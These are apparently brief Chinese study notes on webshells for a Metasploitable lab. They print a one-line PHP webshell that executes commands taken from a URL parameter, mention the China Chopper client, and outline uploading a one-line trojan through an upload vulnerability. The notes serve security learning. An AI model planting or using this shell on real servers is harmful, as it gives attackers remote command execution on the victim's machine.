Webshell
本质:<?php echo shell_exec($_GET['cmd']);?>
就是连接web执行一个shell终端,用一句话在浏览器中执行,不方便
windows平台
中国菜刀
中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强 【但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/】
1、利用上传漏洞,先上传一句话木马【支持三种服务器端PHP、ASP、ASP.NET】
使用ssh连接metasploitable
创建包含木马代码的文件